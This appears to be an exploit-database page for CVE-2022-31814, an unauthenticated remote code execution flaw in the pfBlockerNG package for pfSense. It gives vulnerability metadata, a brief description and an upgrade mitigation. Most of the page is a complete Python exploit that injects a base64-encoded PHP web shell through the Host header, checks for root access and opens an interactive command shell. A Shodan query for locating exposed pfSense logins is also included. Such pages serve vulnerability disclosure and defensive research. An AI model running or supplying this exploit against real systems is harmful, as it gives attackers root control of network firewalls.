header-logo
Suggest Exploit
vendor:
pfSense
by:
IHTeam
9.8
CVSS
CRITICAL
Remote Code Execution (RCE)
78
CWE
Product Name: pfSense
Affected Version From: 2.1.4_26
Affected Version To: 2.1.4_26
Patch Exists: YES
Related CWE: CVE-2022-31814
CPE: a:netgate:pfsense:2.1.4_26
Metasploit:
Other Scripts:
Tags: packetstorm,cve,cve2022,pfsense,pfblockerng,rce,oast
CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Nuclei References: https://www.ihteam.net/advisory/pfblockerng-unauth-rce-vulnerability/https://docs.netgate.com/pfsense/en/latest/packages/pfblocker.htmlhttps://github.com/EvergreenCartoons/SenselessViolencehttps://nvd.nist.gov/vuln/detail/CVE-2022-31814http://packetstormsecurity.com/files/171123/pfBlockerNG-2.1.4_26-Remote-Code-Execution.html
Nuclei Metadata: {'max-request': 2, 'verified': True, 'framework': 'pfsense', 'vendor': 'netgate', 'product': 'pfblockerng'}
Platforms Tested: pfSense 2.6.0
2022

pfBlockerNG 2.1.4_26 – Remote Code Execution (RCE)

pfBlockerNG is a package for pfSense which provides the ability to extend the firewall rule set to provide more granular filtering. A vulnerability exists in pfBlockerNG version 2.1.4_26 which allows an unauthenticated attacker to execute arbitrary code on the vulnerable system. This is due to the lack of input validation in the Host header of the index.php page. An attacker can craft a malicious Host header which will execute arbitrary code on the vulnerable system.

Mitigation:

Upgrade to the latest version of pfBlockerNG.
Source

Exploit-DB raw data:

# Exploit Title: pfBlockerNG 2.1.4_26 - Remote Code Execution (RCE)
# Shodan Results: https://www.shodan.io/search?query=http.title%3A%22pfSense+-+Login%22+%22Server%3A+nginx%22+%22Set-Cookie%3A+PHPSESSID%3D%22
# Date: 5th of September 2022
# Exploit Author: IHTeam
# Vendor Homepage: https://docs.netgate.com/pfsense/en/latest/packages/pfblocker.html
# Software Link: https://github.com/pfsense/FreeBSD-ports/pull/1169
# Version: 2.1.4_26
# Tested on: pfSense 2.6.0
# CVE : CVE-2022-31814
# Original Advisory: https://www.ihteam.net/advisory/pfblockerng-unauth-rce-vulnerability/
 
#!/usr/bin/env python3
import argparse
import requests
import time
import sys
import urllib.parse
from requests.packages.urllib3.exceptions import InsecureRequestWarning
 
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
 
parser = argparse.ArgumentParser(description="pfBlockerNG <= 2.1.4_26 Unauth RCE")
parser.add_argument('--url', action='store', dest='url', required=True, help="Full URL and port e.g.: https://192.168.1.111:443/")
args = parser.parse_args()
 
url = args.url
shell_filename = "system_advanced_control.php"
 
def check_endpoint(url):
	response = requests.get('%s/pfblockerng/www/index.php' % (url), verify=False)
	if response.status_code == 200:
		print("[+] pfBlockerNG is installed")
	else:
		print("\n[-] pfBlockerNG not installed")
		sys.exit()
 
def upload_shell(url, shell_filename):
	payload = {"Host":"' *; echo 'PD8kYT1mb3BlbigiL3Vzci9sb2NhbC93d3cvc3lzdGVtX2FkdmFuY2VkX2NvbnRyb2wucGhwIiwidyIpIG9yIGRpZSgpOyR0PSc8P3BocCBwcmludChwYXNzdGhydSggJF9HRVRbImMiXSkpOz8+Jztmd3JpdGUoJGEsJHQpO2ZjbG9zZSggJGEpOz8+'|python3.8 -m base64 -d | php; '"}
	print("[/] Uploading shell...")
	response = requests.get('%s/pfblockerng/www/index.php' % (url), headers=payload, verify=False)
	time.sleep(2)
	response = requests.get('%s/system_advanced_control.php?c=id' % (url), verify=False)
	if ('uid=0(root) gid=0(wheel)' in str(response.content, 'utf-8')):
		print("[+] Upload succeeded")
	else:
		print("\n[-] Error uploading shell. Probably patched ", response.content)
		sys.exit()
 
def interactive_shell(url, shell_filename, cmd):
	response = requests.get('%s/system_advanced_control.php?c=%s' % (url, urllib.parse.quote(cmd, safe='')), verify=False)
	print(str(response.text)+"\n")
 
 
def delete_shell(url, shell_filename):
	delcmd = "rm /usr/local/www/system_advanced_control.php"
	response = requests.get('%s/system_advanced_control.php?c=%s' % (url, urllib.parse.quote(delcmd, safe='')), verify=False)
	print("\n[+] Shell deleted")
 
check_endpoint(url)
upload_shell(url, shell_filename)
try:
	while True:
		cmd = input("# ")
		interactive_shell(url, shell_filename, cmd)
except:
	delete_shell(url, shell_filename)

Navigation

Suggest Exploit

Services By CQR